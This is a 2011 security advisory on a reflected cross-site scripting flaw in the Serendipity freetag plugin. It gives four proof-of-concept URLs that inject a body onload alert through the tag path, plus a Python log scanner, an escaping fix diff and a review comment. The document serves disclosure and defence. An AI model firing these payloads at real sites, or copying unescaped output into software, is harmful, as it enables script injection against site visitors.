SSCHADV2011-004 - Cross-Site Scripting vulnerability in Serendipity Plugin "serendipity_event_freetag"
Advisory: XSS vulnerability in Serendipity Plugin "serendipity_event_freetag"
Advisory ID: SSCHADV2011-004
Author: Stefan Schurtz
Affected Software: Successfully tested on: serendipity_event_freetag – version 3.21
Vendor URL: http://www.s9y.org
Vendor Status: Version 3.22 – Fix possible XSS
CVE-ID: -
======================
Vulnerability Description:
======================
This is a Cross-Site Scripting vulnerability
==============
Technical Details:
==============
http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(666)>
http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(String.fromCharCode(88,83,83))>
http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(666)>
http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(String.fromCharCode(88,83,83))>
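A log check for the request pattern shown above, added here as an example (it is not part of the original advisory or of the Serendipity project). It flags requests whose tag segment under /plugin/tag/ decodes to HTML markup characters; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Tag segment of the URL form shown in this advisory: index.php?/plugin/tag/<tag>
TAG_RE = re.compile(r'/plugin/tag/([^\s"]*)', re.IGNORECASE)
# Characters that must be escaped before the tag is echoed into HTML.
MARKUP_RE = re.compile(r'[<>"]')

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%253C) is caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_tag(request_line):
    """Return the decoded tag if it contains markup characters, else None."""
    match = TAG_RE.search(request_line)
    if not match:
        return None
    tag = decode_fully(match.group(1))
    return tag if MARKUP_RE.search(tag) else None

def scan(lines):
    """Return (line_number, decoded_tag) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        tag = suspicious_tag(line)
        if tag is not None:
            hits.append((number, tag))
    return hits

# Constructed sample lines (combined log format, documentation IP range).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/May/2011:20:01:02 +0200] "GET /serendipity/index.php?/plugin/tag/php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [30/May/2011:20:03:17 +0200] "GET /serendipity/index.php?/plugin/tag/hallo=%3E%3Cbody%20onload=alert(666)%3E HTTP/1.1" 200 5310',
    '192.0.2.44 - - [30/May/2011:20:03:40 +0200] "GET /serendipity/index.php?/plugin/tag/%253Cbody%2520onload%253Dalert(666)%253E HTTP/1.1" 200 5298',
    '192.0.2.10 - - [30/May/2011:20:05:00 +0200] "GET /serendipity/index.php?/archives/2011/05.html HTTP/1.1" 200 8800',
]

if __name__ == "__main__":
    for number, tag in scan(SAMPLE_LOG):
        print(f"line {number}: tag contains markup: {tag!r}")
```

Hits on a site still running version 3.21 indicate the tag title was echoed unescaped for those requests; on 3.22 the same requests are rendered as escaped text.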
=====
Solution:
=====
Update to the latest version 3.22
diff serendipity_event_freetag.php
< <?php #$Id: serendipity_event_freetag.php,v 1.148 2011/05/09 08:19:30 garvinhicking Exp $
> <?php #$Id: serendipity_event_freetag.php,v 1.149 2011/05/30 20:25:24 garvinhicking Exp $
< $propbag->add(‘version’, ‘3.21’);
> $propbag->add(‘version’, ‘3.22’);
< $serendipity[‘smarty’]->assign(‘freetag_tagTitle’, is_array($this->displayTag) ? implode(’ + ‘,$this->displayTag) : $this->displayTag);
> $serendipity[‘smarty’]->assign(‘freetag_tagTitle’, htmlspecialchars(is_array($this->displayTag) ? implode(’ + ‘,$this->displayTag) : $this->displayTag));
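Review bot: htmlspecialchars() on the freetag_tagTitle assign is called with a single argument, so quote handling and character set fall back to the PHP defaults. On PHP versions where the default flag is ENT_COMPAT, single quotes pass through unescaped, which matters if a template places freetag_tagTitle inside a single-quoted attribute. Suggest passing ENT_QUOTES and the blog's charset explicitly. The diff covers only this one assign; any other place where $this->displayTag reaches output is not visible here and should be checked for the same escaping.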
================
Disclosure Timeline:
================
30-May-2011 – informed developers
30-May-2011 – Release date of this security advisory
30-May-2011 – Version 3.22 – Fix possible XSS
====
Credits:
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References:
=======
http://www.s9y.org